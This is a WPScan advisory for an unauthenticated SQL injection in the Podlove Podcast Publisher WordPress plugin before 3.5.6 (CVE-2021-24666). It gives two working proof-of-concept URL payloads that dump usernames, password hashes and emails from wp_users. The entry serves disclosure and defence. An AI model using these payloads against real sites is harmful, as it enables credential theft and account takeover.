WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Podlove Podcast Publisher < 3.5.6 - Unauthenticated SQL Injection

Description

The plugin contains a 'Social & Donations' module (not activated by default), which adds the rest route '/services/contributor/(?P<id>[\d]+), takes an 'id' and 'category' parameters as arguments. Both parameters can be used for the SQLi.

Proof of Concept

With the 'Social & Donations' module of the plugin activated.

Permalink Setting: Plain

PoC with payload in id param:
/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1+UNION+SELECT+user_login,user_pass,user_email,null,null,null+FROM+wp_users%23

PoC with payload in category param:
/index.php?rest_route=/podlove/v1/social/services/contributor/1&category=1')+UNION+SELECT+user_login,user_pass,user_email,null,null,null+FROM+wp_users%23

Affects Plugins

podlove-podcasting-plugin-for-wordpress
Fixed in version 3.5.6

References

CVE
CVE-2021-24666
URL
https://github.com/podlove/podlove-publisher/commit/aa8a343a2e2333b34a422f801adee09b020c6d76

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

dc11

Submitter

dc11

Verified

Yes

WPVDB ID
fb4d7988-60ff-4862-96a1-80b1866336fe

Timeline

Publicly Published

2021-08-24 (about 9 months ago)

Added

2021-08-24 (about 9 months ago)

Last Updated

2022-04-09 (about 1 months ago)

Our Other Services

WPScan WordPress Security Plugin